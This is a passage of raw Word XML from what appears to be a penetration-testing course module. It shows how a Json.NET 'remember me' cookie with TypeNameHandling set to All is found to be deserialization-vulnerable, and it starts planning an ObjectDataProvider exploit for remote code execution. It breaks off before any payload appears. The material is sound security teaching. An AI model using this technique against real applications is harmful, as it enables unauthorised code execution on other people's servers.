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A9BF" w14:textId="77777777" w:rsidR="00682576" w:rsidRPr="00682576" w:rsidRDefault="00682576" w:rsidP="00682576">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682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Example 1: JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4971CE91" w14:textId="77777777" w:rsidR="00682576" w:rsidRPr="00682576" w:rsidRDefault="00682576" w:rsidP="00682576">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682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Discovering the Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0E63C6"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Let's take a look at one of the potentially vulnerable function calls that we identified in an earlier section, specifically the call to </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>JsonConvert.DeserializeObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Authentication.RememberMeUtil</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79166743" w14:textId="50C873F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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04715C97" wp14:editId="5133F19A">
            <wp:extent cx="5940425" cy="2460625"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1620793478"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2460625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B84685A"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Based on the name of the class and related variables, we can assume this bit of code has to do with the application's </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>"remember me"</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> functionality. If we log into the website with the credentials </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>pentest:pentest</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>"Remember me"</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> option checked, we can look at our cookies to spot the </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>"TTREMEMBER"</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSON cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A43E01" w14:textId="7DE9FF40"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BF9B2D9" wp14:editId="0662231F">
            <wp:extent cx="5940425" cy="2525395"/>
            <wp:effectExtent l="0" t="0" r="3175" b="8255"/>
            <wp:docPr id="879192081"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525395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EB8934"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Double-checking with the source code, we can confirm that this is indeed the cookie that is being deserialized in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>validateCookieAndReturnUser</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> method of </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>RememberMeUtil</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">, and that it is created in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>createCookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> method of the same class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFB4563" w14:textId="77777777" w:rsidR="00682576" w:rsidRPr="00682576" w:rsidRDefault="00682576" w:rsidP="00682576">
      <w:pPr>
        <w:spacing w:after="0"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Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A1DB55"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public static readonly string REMEMBER_ME_COOKIE_NAME = "TTREMEMBER";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206802CE"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514051C8"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&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8E414C"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0B6BB9B5"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public static HttpCookie createCookie(CustomMembershipUser user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC017F7"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6A6435F2"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RememberMe rememberMe = new RememberMe(user.Username, user.RememberToken);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21766F3D"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string jsonString = JsonConvert.SerializeObject(rememberMe);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57964755"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HttpCookie cookie = new HttpCookie(REMEMBER_ME_COOKIE_NAME, jsonString);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3B6F5B"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cookie.Secure = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722BC9FA"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cookie.HttpOnly = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F06672"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cookie.Expires = DateTime.Now.AddDays(30.0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6596E92C"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return cookie;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697C1AF1"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59228736"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Before we spend any more time reverse-engineering the system, let's check if this deserialization call is vulnerable or not. With a quick search, we will find the previously mentioned </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00682576">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          </w:rPr>
          <w:t>Friday the 13th JSON Attacks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> whitepaper by Alvaro Muñoz and Oleksandr Mirosh. The paper discusses various Java and .NET serializers that utilize JSON and explores their vulnerabilities and when they are susceptible. On </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>page 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can see the following paragraph about </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Json.Net</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is the specific library being used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>TeeTrove</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> to (de)serialize this cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA9FF88" w14:textId="63273BF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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="054EE5D5" wp14:editId="2EC1FD82">
            <wp:extent cx="5940425" cy="2233295"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="585456195"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233295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BCC0E0"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According to the white paper, </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Json.NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> will not deserialize data of the wrong type by default, which would prevent us from passing something like a serialized </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>ObjectDataProvider</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> object instead of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>RememberMe</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> object. However, by setting the </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>TypeNameHandling</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a non-</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> value, this behavior can be disabled. If we look at the relevant source code again, we will notice that </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>TypeNameHandling</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> is set to </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>All</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>, so it appears that this deserialization call should be vulnerable!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24401B42" w14:textId="5D8A7904"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ED3DC4B" wp14:editId="05425A2F">
            <wp:extent cx="5940425" cy="3039110"/>
            <wp:effectExtent l="0" t="0" r="3175" b="8890"/>
            <wp:docPr id="779889435"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039110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A626A33"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Note: Now that we know setting </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>TypeNameHandling</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> can lead to deserialization vulnerabilities, we can search through source code for this term specifically in the future to find interesting lines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C90FB59" w14:textId="77777777" w:rsidR="00682576" w:rsidRPr="00682576" w:rsidRDefault="00682576" w:rsidP="00682576">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682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Developing the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2107507D"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At this point, we have reason to believe the call to </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>DeserializeObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> is vulnerable, so let's try to exploit it. We understand how we should be able to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>ObjectDataProvider</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> to execute arbitrary commands upon instantiation (deserialization), so let's create a serialized object we can replace the value of the cookie with to achieve </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>(remote) code execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A78601"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If you don't have </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Visual Studio</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> installed, then this is the point where you should do so. You can download the latest version from </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00682576">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">, just make sure the </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>.NET desktop environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> option is selected during the installation process so that the necessary files are downloaded and made available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CCAFDA" w14:textId="6B101ADD"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B700C3" wp14:editId="06E71B54">
            <wp:extent cx="5940425" cy="3014345"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1321021864"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14345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38830FB8"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">With </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Visual Studio</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
